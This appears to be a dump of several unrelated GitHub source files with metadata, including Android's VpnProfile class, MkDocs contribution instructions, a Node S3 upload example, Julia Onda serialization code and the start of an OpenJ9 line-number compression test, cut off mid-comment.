text
stringlengths 2
100k
| meta
dict |
---|---|
// AMD module: toolbar item model for the boolean "intersect" operation.
// Specializes the shared BooleanItemModel with the intersect-specific
// vertex constructor and toolbar icon.
define([
  'geomnode',
  'icons',
  'toolbars/booleanitemmodel',
], function(
  GeomNode,
  icons,
  BooleanItemModel) {

  // All intersect-specific configuration lives in this extend() call;
  // behavior comes from BooleanItemModel.
  var Model = BooleanItemModel.extend({
    name: 'intersect',
    VertexConstructor: GeomNode.Intersect,
    icon: icons['intersect'],
  });

  return Model;

});
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2011 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.internal.net;
import android.os.Parcel;
import android.os.Parcelable;
import android.text.TextUtils;
import android.util.Log;
import java.net.InetAddress;
import java.nio.charset.Charsets;
/**
* Parcel-like entity class for VPN profiles. To keep things simple, all
* fields are package private. Methods are provided for serialization, so
* storage can be implemented easily. Two rules are set for this class.
* First, all fields must be kept non-null. Second, always make a copy
* using clone() before modifying.
*
* @hide
*/
public class VpnProfile implements Cloneable, Parcelable {
    private static final String TAG = "VpnProfile";

    // Match these constants with R.array.vpn_types.
    public static final int TYPE_PPTP = 0;
    public static final int TYPE_L2TP_IPSEC_PSK = 1;
    public static final int TYPE_L2TP_IPSEC_RSA = 2;
    public static final int TYPE_IPSEC_XAUTH_PSK = 3;
    public static final int TYPE_IPSEC_XAUTH_RSA = 4;
    public static final int TYPE_IPSEC_HYBRID_RSA = 5;
    public static final int TYPE_MAX = 5;

    // Entity fields. The trailing number is the field's slot in the
    // NUL-separated form produced by encode() and parsed by decode().
    public final String key;            // -1
    public String name = "";            // 0
    public int type = TYPE_PPTP;        // 1
    public String server = "";          // 2
    public String username = "";        // 3
    public String password = "";        // 4
    public String dnsServers = "";      // 5
    public String searchDomains = "";   // 6
    public String routes = "";          // 7
    public boolean mppe = true;         // 8
    public String l2tpSecret = "";      // 9
    public String ipsecIdentifier = "";// 10
    public String ipsecSecret = "";     // 11
    public String ipsecUserCert = "";   // 12
    public String ipsecCaCert = "";     // 13
    public String ipsecServerCert = "";// 14

    // Helper fields. saveLogin has no encoded slot of its own; decode()
    // derives it from whether username/password were persisted.
    public boolean saveLogin = false;

    public VpnProfile(String key) {
        this.key = key;
    }

    /** Reconstructs a profile from a Parcel written by {@link #writeToParcel}. */
    public VpnProfile(Parcel in) {
        key = in.readString();
        name = in.readString();
        type = in.readInt();
        server = in.readString();
        username = in.readString();
        password = in.readString();
        dnsServers = in.readString();
        searchDomains = in.readString();
        routes = in.readString();
        mppe = in.readInt() != 0;
        l2tpSecret = in.readString();
        ipsecIdentifier = in.readString();
        ipsecSecret = in.readString();
        ipsecUserCert = in.readString();
        ipsecCaCert = in.readString();
        ipsecServerCert = in.readString();
        saveLogin = in.readInt() != 0;
    }

    @Override
    public void writeToParcel(Parcel out, int flags) {
        // Field order must match the VpnProfile(Parcel) constructor exactly.
        out.writeString(key);
        out.writeString(name);
        out.writeInt(type);
        out.writeString(server);
        out.writeString(username);
        out.writeString(password);
        out.writeString(dnsServers);
        out.writeString(searchDomains);
        out.writeString(routes);
        out.writeInt(mppe ? 1 : 0);
        out.writeString(l2tpSecret);
        out.writeString(ipsecIdentifier);
        out.writeString(ipsecSecret);
        out.writeString(ipsecUserCert);
        out.writeString(ipsecCaCert);
        out.writeString(ipsecServerCert);
        out.writeInt(saveLogin ? 1 : 0);
    }

    /**
     * Decodes a profile from its NUL-separated UTF-8 byte form (the inverse
     * of {@link #encode()}).
     *
     * @param key the storage key to associate with the decoded profile
     * @param value bytes previously produced by {@link #encode()}
     * @return the decoded profile, or {@code null} if {@code key} is null or
     *         {@code value} is malformed (parsing is deliberately
     *         best-effort: any exception yields {@code null})
     */
    public static VpnProfile decode(String key, byte[] value) {
        try {
            if (key == null) {
                return null;
            }
            // The -1 limit keeps trailing empty fields in the split result.
            String[] values = new String(value, Charsets.UTF_8).split("\0", -1);
            // There can be 14 or 15 values in ICS MR1.
            if (values.length < 14 || values.length > 15) {
                return null;
            }
            VpnProfile profile = new VpnProfile(key);
            profile.name = values[0];
            profile.type = Integer.parseInt(values[1]);
            if (profile.type < 0 || profile.type > TYPE_MAX) {
                return null;
            }
            profile.server = values[2];
            profile.username = values[3];
            profile.password = values[4];
            profile.dnsServers = values[5];
            profile.searchDomains = values[6];
            profile.routes = values[7];
            profile.mppe = Boolean.parseBoolean(values[8]);
            profile.l2tpSecret = values[9];
            profile.ipsecIdentifier = values[10];
            profile.ipsecSecret = values[11];
            profile.ipsecUserCert = values[12];
            profile.ipsecCaCert = values[13];
            // 15th field is optional (added after the 14-field format).
            profile.ipsecServerCert = (values.length > 14) ? values[14] : "";
            // Credentials are only persisted when the user chose to save them.
            profile.saveLogin = !profile.username.isEmpty() || !profile.password.isEmpty();
            return profile;
        } catch (Exception e) {
            // Best-effort parse: malformed input falls through to null below.
        }
        return null;
    }

    /**
     * Encodes this profile as NUL-separated UTF-8 bytes, the inverse of
     * {@link #decode(String, byte[])}. The key is not included; username and
     * password are only written when {@link #saveLogin} is set.
     */
    public byte[] encode() {
        StringBuilder builder = new StringBuilder(name);
        builder.append('\0').append(type);
        builder.append('\0').append(server);
        builder.append('\0').append(saveLogin ? username : "");
        builder.append('\0').append(saveLogin ? password : "");
        builder.append('\0').append(dnsServers);
        builder.append('\0').append(searchDomains);
        builder.append('\0').append(routes);
        builder.append('\0').append(mppe);
        builder.append('\0').append(l2tpSecret);
        builder.append('\0').append(ipsecIdentifier);
        builder.append('\0').append(ipsecSecret);
        builder.append('\0').append(ipsecUserCert);
        builder.append('\0').append(ipsecCaCert);
        builder.append('\0').append(ipsecServerCert);
        return builder.toString().getBytes(Charsets.UTF_8);
    }

    /**
     * Test if profile is valid for lockdown, which requires IPv4 address for
     * both server and DNS. Server hostnames would require using DNS before
     * connection.
     */
    public boolean isValidLockdownProfile() {
        try {
            InetAddress.parseNumericAddress(server);
            // Check for missing DNS before parsing; previously this branch
            // was unreachable because parseNumericAddress("") threw first.
            if (TextUtils.isEmpty(dnsServers)) {
                Log.w(TAG, "DNS required");
                return false;
            }
            for (String dnsServer : dnsServers.split(" +")) {
                // Validate each entry individually. (Fixes a bug where the
                // entire space-separated dnsServers string was re-parsed on
                // every iteration, rejecting any multi-server list.)
                InetAddress.parseNumericAddress(dnsServer);
            }
            // Everything checked out above
            return true;
        } catch (IllegalArgumentException e) {
            Log.w(TAG, "Invalid address", e);
            return false;
        }
    }

    public static final Creator<VpnProfile> CREATOR = new Creator<VpnProfile>() {
        @Override
        public VpnProfile createFromParcel(Parcel in) {
            return new VpnProfile(in);
        }

        @Override
        public VpnProfile[] newArray(int size) {
            return new VpnProfile[size];
        }
    };

    @Override
    public int describeContents() {
        return 0;
    }
}
| {
"pile_set_name": "Github"
} |
[English](./contribution-docs.md)|[中文](../zh/community/contribution-docs.md)
# Contributing documents
## Installing Python
Install [Python](https://www.python.org/) or [Anaconda](https://www.anaconda.com/).
[MkDocs](https://www.mkdocs.org/) supports Python versions 2.7, 3.4, 3.5, 3.6, 3.7 and pypy.
## Installing pip
- If you're using a recent version of Python, the Python package manager, pip,
is most likely installed by default. However, you may need to upgrade pip to the latest version:
```
pip install --upgrade pip
```
- If you need to install pip for the first time, download get-pip.py.
Then run the following command to install it:
```shell
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
python get-pip.py
```
## Installing MkDocs and dependencies
Install the mkdocs package and dependencies using pip:
```shell
pip install -r docs/requirements.txt
```
You should now have the mkdocs command installed on your system. Run `mkdocs
--version` to check that everything worked okay.
## Run mkdocs
```shell
mkdocs serve || mkdocs serve -a IP:port
```
Open your browser at `http://127.0.0.1:8000`

## Write markdown documents
- Create a new `.md` file in the `/docs` directory,
Chinese docs under `/docs/zh`.
- Edit `mkdocs.yml` and add pages. [Tutorial](https://www.mkdocs.org/#adding-pages)
```yml
nav:
- Home: 'index.md'
- User Guide:
- 'JDBC Doc': 'user-guide/jdbc.md'
- 'Build Doc': 'user-guide/build.md'
- 'API Doc': 'user-guide/api.md'
- Community:
- Channel: 'community.md'
- Contribution:
- Code: 'contribution-code.md'
- Docs: 'contribution-docs.md'
- About:
- 'License': 'about/license.md'
- 'Release Notes': 'about/release-notes.md'
```
## Commit
Push all your changes and open a PR. | {
"pile_set_name": "Github"
} |
---
title: ERC721 & Crypto-Collectibles
header: "Lesson 5: ERC721 & Crypto-Collectibles"
roadmap: roadmap5.jpg
path: solidity
---
Whew! Things are starting to heat up in here...
In this lesson, we're going to get a bit more advanced.
We're going to talk about **tokens**, the **ERC721** standard, and **crypto-collectible assets**.
In other words, we're going to **make it so you can trade your zombies with your friends.**
| {
"pile_set_name": "Github"
} |
config ISO9660_FS
tristate "ISO 9660 CDROM file system support"
help
This is the standard file system used on CD-ROMs. It was previously
known as "High Sierra File System" and is called "hsfs" on other
Unix systems. The so-called Rock-Ridge extensions which allow for
long Unix filenames and symbolic links are also supported by this
driver. If you have a CD-ROM drive and want to do more with it than
just listen to audio CDs and watch its LEDs, say Y (and read
<file:Documentation/filesystems/isofs.txt> and the CD-ROM-HOWTO,
available from <http://www.tldp.org/docs.html#howto>), thereby
enlarging your kernel by about 27 KB; otherwise say N.
To compile this file system support as a module, choose M here: the
module will be called isofs.
config JOLIET
bool "Microsoft Joliet CDROM extensions"
depends on ISO9660_FS
select NLS
help
Joliet is a Microsoft extension for the ISO 9660 CD-ROM file system
which allows for long filenames in unicode format (unicode is the
new 16 bit character code, successor to ASCII, which encodes the
characters of almost all languages of the world; see
<http://www.unicode.org/> for more information). Say Y here if you
want to be able to read Joliet CD-ROMs under Linux.
config ZISOFS
bool "Transparent decompression extension"
depends on ISO9660_FS
select ZLIB_INFLATE
help
This is a Linux-specific extension to RockRidge which lets you store
data in compressed form on a CD-ROM and have it transparently
decompressed when the CD-ROM is accessed. See
<http://www.kernel.org/pub/linux/utils/fs/zisofs/> for the tools
necessary to create such a filesystem. Say Y here if you want to be
able to read such compressed CD-ROMs.
| {
"pile_set_name": "Github"
} |
// Example: stream a multipart file upload straight through to S3 using knox,
// without buffering the file on disk.
//
// Requires S3_KEY, S3_SECRET and S3_BUCKET in the environment. Serves a
// simple upload form on "/" and handles the multipart POST on "/upload".
var http = require('http')
  , util = require('util')
  , multiparty = require('../')
  , knox = require('knox')
  , Batch = require('batch')
  , PORT = process.env.PORT || 27372

var s3Client = knox.createClient({
  secure: false,
  key: process.env.S3_KEY,
  secret: process.env.S3_SECRET,
  bucket: process.env.S3_BUCKET,
});

var server = http.createServer(function(req, res) {
  if (req.url === '/') {
    // Serve the upload form. "path" is the destination key in the bucket.
    res.writeHead(200, {'content-type': 'text/html'});
    res.end(
      '<form action="/upload" enctype="multipart/form-data" method="post">'+
      '<input type="text" name="path"><br>'+
      '<input type="file" name="upload"><br>'+
      '<input type="submit" value="Upload">'+
      '</form>'
    );
  } else if (req.url === '/upload') {
    var headers = {
      'x-amz-acl': 'public-read',
    };
    var form = new multiparty.Form();
    var batch = new Batch();
    // Batch job 1: resolve when the "path" text field arrives.
    batch.push(function(cb) {
      form.on('field', function(name, value) {
        if (name === 'path') {
          var destPath = value;
          // Normalize to an absolute S3 key.
          if (destPath[0] !== '/') destPath = '/' + destPath;
          cb(null, destPath);
        }
      });
    });
    // Batch job 2: resolve when the first file part (with a filename) arrives.
    batch.push(function(cb) {
      form.on('part', function(part) {
        if (! part.filename) return;
        cb(null, part);
      });
    });
    batch.end(function(err, results) {
      if (err) throw err;
      // Both field and file arrived, so the "no uploaded file" close guard
      // is no longer needed.
      form.removeListener('close', onEnd);
      var destPath = results[0]
        , part = results[1];
      // part.byteCount lets us set Content-Length up front and stream the
      // part directly to S3 without buffering.
      headers['Content-Length'] = part.byteCount;
      s3Client.putStream(part, destPath, headers, function(err, s3Response) {
        if (err) throw err;
        res.statusCode = s3Response.statusCode;
        s3Response.pipe(res);
        console.log("https://s3.amazonaws.com/" + process.env.S3_BUCKET + destPath);
      });
    });
    // If the form finishes before both batch jobs fired, no file was uploaded.
    form.on('close', onEnd);
    form.parse(req);
  } else {
    res.writeHead(404, {'content-type': 'text/plain'});
    res.end('404');
  }

  function onEnd() {
    throw new Error("no uploaded file");
  }
});

server.listen(PORT, function() {
  console.info('listening on http://0.0.0.0:'+PORT+'/');
});
| {
"pile_set_name": "Github"
} |
#####
##### MsgPack conversions for Base types
#####
# Nanosecond is serialized as a plain integer (its `.value` field).
MsgPack.msgpack_type(::Type{Nanosecond}) = MsgPack.IntegerType()
MsgPack.from_msgpack(::Type{Nanosecond}, x::Integer) = Nanosecond(x)
MsgPack.to_msgpack(::MsgPack.IntegerType, x::Nanosecond) = x.value

# VersionNumber round-trips through its "v1.2.3" string form; the leading
# 'v' is stripped on the way back in.
MsgPack.msgpack_type(::Type{VersionNumber}) = MsgPack.StringType()
MsgPack.from_msgpack(::Type{VersionNumber}, x::String) = VersionNumber(x[2:end])
MsgPack.to_msgpack(::MsgPack.StringType, x::VersionNumber) = string('v', x)

# UUIDs are serialized via their canonical string representation.
MsgPack.msgpack_type(::Type{UUID}) = MsgPack.StringType()
MsgPack.from_msgpack(::Type{UUID}, x::String) = UUID(x)
MsgPack.to_msgpack(::MsgPack.StringType, x::UUID) = string(x)

# DataTypes are serialized as Onda `sample_type` strings (e.g. "int16");
# the conversion helpers are defined later in this file.
MsgPack.msgpack_type(::Type{DataType}) = MsgPack.StringType()
function MsgPack.from_msgpack(::Type{DataType}, x::String)
    return julia_type_from_onda_sample_type(x)
end
function MsgPack.to_msgpack(::MsgPack.StringType, T::DataType)
    return onda_sample_type_from_julia_type(T)
end
#####
##### Julia DataType <--> Onda `sample_type` string
#####
# Map an Onda `sample_type` string (e.g. "int16") to the corresponding Julia
# primitive type; errors for names the Onda specification does not support.
function julia_type_from_onda_sample_type(t::AbstractString)
    if t == "int8"
        return Int8
    elseif t == "int16"
        return Int16
    elseif t == "int32"
        return Int32
    elseif t == "int64"
        return Int64
    elseif t == "uint8"
        return UInt8
    elseif t == "uint16"
        return UInt16
    elseif t == "uint32"
        return UInt32
    elseif t == "uint64"
        return UInt64
    else
        return error("sample type ", t, " is not supported by Onda")
    end
end
# Map a Julia primitive type to its Onda `sample_type` string; errors for
# types the Onda specification does not support.
function onda_sample_type_from_julia_type(T::Type)
    if T === Int8
        return "int8"
    elseif T === Int16
        return "int16"
    elseif T === Int32
        return "int32"
    elseif T === Int64
        return "int64"
    elseif T === UInt8
        return "uint8"
    elseif T === UInt16
        return "uint16"
    elseif T === UInt32
        return "uint32"
    elseif T === UInt64
        return "uint64"
    else
        return error("sample type ", T, " is not supported by Onda")
    end
end
#####
##### annotations
#####
"""
    Annotation <: AbstractTimeSpan

A type representing an individual Onda annotation object. Instances contain
the following fields, following the Onda specification for annotation objects:

- `value::String`
- `start_nanosecond::Nanosecond`
- `stop_nanosecond::Nanosecond`
"""
struct Annotation <: AbstractTimeSpan
    value::String
    start_nanosecond::Nanosecond
    stop_nanosecond::Nanosecond
    function Annotation(value::AbstractString, start::Nanosecond, stop::Nanosecond)
        # Reject malformed spans up front so every Annotation is valid.
        _validate_timespan(start, stop)
        return new(value, start, stop)
    end
end

# Serialized by MsgPack as a map of the struct's fields.
MsgPack.msgpack_type(::Type{Annotation}) = MsgPack.StructType()

# Convenience constructor: take the endpoints from any AbstractTimeSpan.
function Annotation(value, span::AbstractTimeSpan)
    return Annotation(value, first(span), last(span))
end

# AbstractTimeSpan interface: an annotation spans [start, stop] nanoseconds.
Base.first(annotation::Annotation) = annotation.start_nanosecond
Base.last(annotation::Annotation) = annotation.stop_nanosecond
#####
##### signals
#####
"""
    Signal

A type representing an individual Onda signal object. Instances contain
the following fields, following the Onda specification for signal objects:

- `channel_names::Vector{Symbol}`
- `start_nanosecond::Nanosecond`
- `stop_nanosecond::Nanosecond`
- `sample_unit::Symbol`
- `sample_resolution_in_unit::Float64`
- `sample_offset_in_unit::Float64`
- `sample_type::DataType`
- `sample_rate::Float64`
- `file_extension::Symbol`
- `file_options::Union{Nothing,Dict{Symbol,Any}}`
"""
Base.@kwdef struct Signal
    channel_names::Vector{Symbol}
    start_nanosecond::Nanosecond
    stop_nanosecond::Nanosecond
    sample_unit::Symbol
    sample_resolution_in_unit::Float64
    sample_offset_in_unit::Float64
    sample_type::DataType
    sample_rate::Float64
    file_extension::Symbol
    file_options::Union{Nothing,Dict{Symbol,Any}}
    function Signal(channel_names, start_nanosecond, stop_nanosecond, sample_unit,
                    sample_resolution_in_unit, sample_offset_in_unit, sample_type,
                    sample_rate, file_extension, file_options)
        # Reject malformed spans before constructing the instance.
        _validate_timespan(start_nanosecond, stop_nanosecond)
        return new(channel_names, start_nanosecond, stop_nanosecond, sample_unit,
                   sample_resolution_in_unit, sample_offset_in_unit, sample_type,
                   sample_rate, file_extension, file_options)
    end
end

# Field-wise equality across all of Signal's fields (so e.g. the
# channel_names vectors compare by value rather than identity).
function Base.:(==)(a::Signal, b::Signal)
    return all(name -> getfield(a, name) == getfield(b, name), fieldnames(Signal))
end

# Serialized by MsgPack as a map of the struct's fields.
MsgPack.msgpack_type(::Type{Signal}) = MsgPack.StructType()

# A signal is valid when its unit and channel names are lower-snake-case
# alphanumeric (channel names may additionally contain '-' and '.') and its
# sample type maps to a supported Onda sample type string.
function is_valid(signal::Signal)
    return is_lower_snake_case_alphanumeric(string(signal.sample_unit)) &&
           all(n -> is_lower_snake_case_alphanumeric(string(n), ('-', '.')),
               signal.channel_names) &&
           onda_sample_type_from_julia_type(signal.sample_type) isa AbstractString
end

# Look up `name` in `signal.file_options`, returning `default` when the
# options dict is absent or lacks the key.
function file_option(signal::Signal, name, default)
    signal.file_options isa Dict && return get(signal.file_options, name, default)
    return default
end
"""
    signal_from_template(signal::Signal;
                         channel_names=signal.channel_names,
                         start_nanosecond=signal.start_nanosecond,
                         stop_nanosecond=signal.stop_nanosecond,
                         sample_unit=signal.sample_unit,
                         sample_resolution_in_unit=signal.sample_resolution_in_unit,
                         sample_offset_in_unit=signal.sample_offset_in_unit,
                         sample_type=signal.sample_type,
                         sample_rate=signal.sample_rate,
                         file_extension=signal.file_extension,
                         file_options=signal.file_options)

Return a `Signal` where each field is mapped to the corresponding keyword argument.
"""
function signal_from_template(signal::Signal; channel_names=signal.channel_names,
                              start_nanosecond=signal.start_nanosecond,
                              stop_nanosecond=signal.stop_nanosecond,
                              sample_unit=signal.sample_unit,
                              sample_resolution_in_unit=signal.sample_resolution_in_unit,
                              sample_offset_in_unit=signal.sample_offset_in_unit,
                              sample_type=signal.sample_type,
                              sample_rate=signal.sample_rate,
                              file_extension=signal.file_extension,
                              file_options=signal.file_options)
    return Signal(channel_names, start_nanosecond, stop_nanosecond, sample_unit,
                  sample_resolution_in_unit, sample_offset_in_unit, sample_type,
                  sample_rate, file_extension, file_options)
end

"""
    channel(signal::Signal, name::Symbol)

Return `i` where `signal.channel_names[i] == name`.
"""
function channel(signal::Signal, name::Symbol)
    # `findfirst` returns `nothing` when `name` is not a channel of `signal`.
    return findfirst(isequal(name), signal.channel_names)
end

"""
    channel(signal::Signal, i::Integer)

Return `signal.channel_names[i]`.
"""
channel(signal::Signal, i::Integer) = signal.channel_names[i]

"""
    channel_count(signal::Signal)

Return `length(signal.channel_names)`.
"""
channel_count(signal::Signal) = length(signal.channel_names)

"""
    span(signal::Signal)

Return `TimeSpan(signal.start_nanosecond, signal.stop_nanosecond)`.
"""
span(signal::Signal) = TimeSpan(signal.start_nanosecond, signal.stop_nanosecond)

"""
    duration(signal::Signal)

Return `duration(span(signal))`.
"""
duration(signal::Signal) = duration(span(signal))

"""
    sample_count(signal::Signal)

Return the number of multichannel samples that fit within `duration(signal)`
given `signal.sample_rate`.
"""
function sample_count(signal::Signal)
    # NOTE(review): assumes `index_from_time` returns the 1-based index just
    # past the given duration, hence the `- 1` — confirm against its docs.
    return index_from_time(signal.sample_rate, duration(signal)) - 1
end

"""
    sizeof_samples(signal::Signal)

Returns the expected size (in bytes) of the encoded `Samples` object corresponding
to the entirety of `signal`:

    sample_count(signal) * channel_count(signal) * sizeof(signal.sample_type)
"""
function sizeof_samples(signal::Signal)
    return sample_count(signal) * channel_count(signal) * sizeof(signal.sample_type)
end
#####
##### recordings
#####
"""
    Recording

A type representing an individual Onda recording object. Instances contain
the following fields, following the Onda specification for recording objects:

- `signals::Dict{Symbol,Signal}`
- `annotations::Set{Annotation}`
"""
struct Recording
    signals::Dict{Symbol,Signal}
    annotations::Set{Annotation}
end

# Field-wise equality across all of Recording's fields.
function Base.:(==)(a::Recording, b::Recording)
    return all(name -> getfield(a, name) == getfield(b, name), fieldnames(Recording))
end

# Serialized by MsgPack as a map of the struct's fields.
MsgPack.msgpack_type(::Type{Recording}) = MsgPack.StructType()

"""
    annotate!(recording::Recording, annotation::Annotation)

Returns `push!(recording.annotations, annotation)`.
"""
function annotate!(recording::Recording, annotation::Annotation)
    return push!(recording.annotations, annotation)
end

"""
    duration(recording::Recording)

Returns `maximum(s -> s.stop_nanosecond, values(recording.signals))`; throws an
`ArgumentError` if `recording.signals` is empty.
"""
function duration(recording::Recording)
    isempty(recording.signals) &&
        throw(ArgumentError("`duration(recording)` is not defined if `isempty(recording.signals)`"))
    return maximum(s -> s.stop_nanosecond, values(recording.signals))
end

"""
    set_span!(recording::Recording, name::Symbol, span::AbstractTimeSpan)

Replace `recording.signals[name]` with a copy that has the `start_nanosecond`
and `stop_nanosecond` fields set to match the provided `span`. Returns the
newly constructed `Signal` instance.
"""
function set_span!(recording::Recording, name::Symbol, span::AbstractTimeSpan)
    # Signal is immutable, so "setting" the span means constructing a fresh
    # Signal from the old one with only the span fields replaced.
    signal = signal_from_template(recording.signals[name]; start_nanosecond=first(span),
                                  stop_nanosecond=last(span))
    recording.signals[name] = signal
    return signal
end

"""
    set_span!(recording::Recording, span::TimeSpan)

Return `Dict(name => set_span!(recording, name, span) for name in keys(recording.signals))`
"""
function set_span!(recording::Recording, span::AbstractTimeSpan)
    return Dict(name => set_span!(recording, name, span)
                for name in keys(recording.signals))
end
#####
##### reading/writing `recordings.msgpack.zst`
#####
# Metadata header stored as the first element of `recordings.msgpack.zst`.
struct Header
    onda_format_version::VersionNumber
    ordered_keys::Bool
end

# Serialized by MsgPack as a map of the struct's fields.
MsgPack.msgpack_type(::Type{Header}) = MsgPack.StructType()

# Read and zstd-decompress `recordings.msgpack.zst` from `path`, returning
# `(header, recordings)`. Warns (but still attempts the load) when the file
# was written by an unsupported Onda format version.
function read_recordings_file(path)
    file_path = joinpath(path, "recordings.msgpack.zst")
    bytes = zstd_decompress(read(file_path))
    io = IOBuffer(bytes)
    # `0x92` is the MessagePack byte prefix for 2-element array
    read(io, UInt8) == 0x92 || error("recordings.msgpack.zst has bad byte prefix")
    header = MsgPack.unpack(io, Header)
    if !is_supported_onda_format_version(header.onda_format_version)
        @warn("attempting to load `Dataset` with unsupported Onda version",
              supported = ONDA_FORMAT_VERSION, attempting = header.onda_format_version)
        @warn("consider upgrading old datasets via `Onda.upgrade_onda_format_from_v0_2_to_v0_3!`")
    end
    # Only request strict (ordered-key) unpacking when the writer promised it.
    strict = header.ordered_keys ? (Recording,) : ()
    recordings = MsgPack.unpack(io, Dict{UUID,Recording}; strict=strict)
    return header, recordings
end

# Replace `recordings.msgpack.zst` under `path`. The existing file is moved
# aside to a backup first so a failed write cannot destroy the previous
# contents; the backup is removed only after the new file is fully written.
function write_recordings_file(path, header::Header, recordings::Dict{UUID,Recording})
    file_path = joinpath(path, "recordings.msgpack.zst")
    backup_file_path = joinpath(path, "_recordings.msgpack.zst.backup")
    isfile(file_path) && mv(file_path, backup_file_path)
    io = IOBuffer()
    MsgPack.pack(io, [header, recordings])
    bytes = zstd_compress(resize!(io.data, io.size))
    write(file_path, bytes)
    rm(backup_file_path; force=true)
    return nothing
end
| {
"pile_set_name": "Github"
} |
<!--
-
- This file is part of the OpenLink Software Virtuoso Open-Source (VOS)
- project.
-
- Copyright (C) 1998-2020 OpenLink Software
-
- This project is free software; you can redistribute it and/or modify it
- under the terms of the GNU General Public License as published by the
- Free Software Foundation; only version 2 of the License, dated June 1991.
-
- This program is distributed in the hope that it will be useful, but
- WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- General Public License for more details.
-
- You should have received a copy of the GNU General Public License along
- with this program; if not, write to the Free Software Foundation, Inc.,
- 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
-
-
-->
<init>
<src load_at_start="" load_to_clean="so_s_32.sql"/>
<deps item="SOAPDEMO" example="SO-S-1" type="user" />
<src start="services.vsmx" link="/services/services.vsmx"/>
<run name="/services/services.vsmx" link="/services/services.vsmx"/>
<http_threads val="2" />
</init>
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2001, 2014 IBM Corp. and others
*
* This program and the accompanying materials are made available under
* the terms of the Eclipse Public License 2.0 which accompanies this
* distribution and is available at https://www.eclipse.org/legal/epl-2.0/
* or the Apache License, Version 2.0 which accompanies this distribution and
* is available at https://www.apache.org/licenses/LICENSE-2.0.
*
* This Source Code may also be made available under the following
* Secondary Licenses when the conditions for such availability set
* forth in the Eclipse Public License, v. 2.0 are satisfied: GNU
* General Public License, version 2 with the GNU Classpath
* Exception [1] and GNU General Public License, version 2 with the
* OpenJDK Assembly Exception [2].
*
* [1] https://www.gnu.org/software/classpath/license.html
* [2] http://openjdk.java.net/legal/assembly-exception.html
*
* SPDX-License-Identifier: EPL-2.0 OR Apache-2.0 OR GPL-2.0 WITH Classpath-exception-2.0 OR LicenseRef-GPL-2.0 WITH Assembly-exception
*******************************************************************************/
#include "j9comp.h"
#include "j9.h"
#include "testHelpers.h"
#include "cfr.h"
#include "rommeth.h"
#include <stdlib.h> /* used for rand() */
/**
 * Verify round-trip compression and decompression of the line number table.
 * Tries every combination of PC between rangePCLow and rangePCHigh
 * and of lineNumber between rangeLineLow and rangeLineHigh, then checks
 * that decompression reproduces the original values and that the compressed
 * size does not regress past maximumSize.
 *
 * @param portLib Pointer to the port library.
 * @param testName Pointer to the test name.
 * @param rangePCLow lowest startPC exercised (inclusive)
 * @param rangePCHigh highest startPC exercised (exclusive)
 * @param rangeLineLow lowest line number exercised (inclusive)
 * @param rangeLineHigh highest line number exercised (exclusive)
 * @param maximumSize compressed-size regression limit, in bytes
 * @return IDATA
 */
static IDATA
testLineNumberCompressionEdge(J9PortLibrary *portLib, const char * testName, U_16 rangePCLow, U_16 rangePCHigh, I_32 rangeLineLow, I_32 rangeLineHigh, I_32 maximumSize)
{
	PORT_ACCESS_FROM_PORT(portLib);
	U_8 * buffer = (U_8*)j9mem_allocate_memory(0xFFFF * 5, OMRMEM_CATEGORY_VM); /* maximum memory possibly needed */
	U_8 * bufferPtr = NULL;
	U_16 startPCIndex;
	I_32 lineNumberIndex;
	J9LineNumber lineNumber;

	reportTestEntry(PORTLIB, testName);

	if (NULL == buffer) {
		outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
		return reportTestExit(PORTLIB, testName);
	}

	for (startPCIndex = rangePCLow; startPCIndex < rangePCHigh; startPCIndex++) {
		/* Compress one table entry per line number, all sharing this startPC. */
		bufferPtr = buffer;
		for (lineNumberIndex = rangeLineLow; lineNumberIndex < rangeLineHigh; lineNumberIndex++) {
			J9CfrLineNumberTableEntry lineNumberTableEntry;
			lineNumberTableEntry.startPC = startPCIndex;
			lineNumberTableEntry.lineNumber = lineNumberIndex;
			if (!compressLineNumbers(&lineNumberTableEntry, 1, NULL, &bufferPtr)) {
				outputErrorMessage(TEST_ERROR_ARGS, "error, the line numbers are not in order\n" );
			}
		}
		/* Decompress the table and compare against the original values. */
		bufferPtr = buffer;
		for (lineNumberIndex = rangeLineLow; lineNumberIndex < rangeLineHigh; lineNumberIndex++) {
			I_32 lineNumberOffsetIntern;
			if (lineNumberIndex < 0) {
				/* For the test to work, set the previous line number to 0xFFFF so that the result is positive with a negative offset */
				lineNumberOffsetIntern = 0xFFFF + lineNumberIndex;
				lineNumber.lineNumber = 0xFFFF;
			} else {
				lineNumberOffsetIntern = lineNumberIndex;
				lineNumber.lineNumber = 0;
			}
			lineNumber.location = 0;
			if (!getNextLineNumberFromTable(&bufferPtr, &lineNumber)) {
				outputErrorMessage(TEST_ERROR_ARGS, "error in getNextLineNumberFromTable, byte format not recognized\n" );
			}
			if ((lineNumber.lineNumber != lineNumberOffsetIntern) || (lineNumber.location != startPCIndex)) {
				outputErrorMessage(TEST_ERROR_ARGS, "Original lineNumber:%d, location:%d \n",lineNumberOffsetIntern, startPCIndex);
				outputErrorMessage(TEST_ERROR_ARGS, "Compressed lineNumber:%d, location:%d \n",lineNumber.lineNumber, lineNumber.location);
			}
		}
	}
	outputComment(PORTLIB, "Total size of: %d\n", bufferPtr - buffer);
	if ((bufferPtr - buffer) > maximumSize) {
		outputErrorMessage(TEST_ERROR_ARGS, "Compression is less efficient, it used to take %d bytes and it takes %d bytes \n", maximumSize, bufferPtr - buffer);
	}
	j9mem_free_memory(buffer);
	return reportTestExit(PORTLIB, testName);
}
/**
 * Test the delta encoding component of the line number table compression.
 * Walks the line number offset from `from` towards `to` by `increment`
 * (which may be negative) while the PC offset always increases, then
 * decompresses the table and verifies every (lineNumber, pcOffset) pair.
 *
 * @param portLib Pointer to the port library.
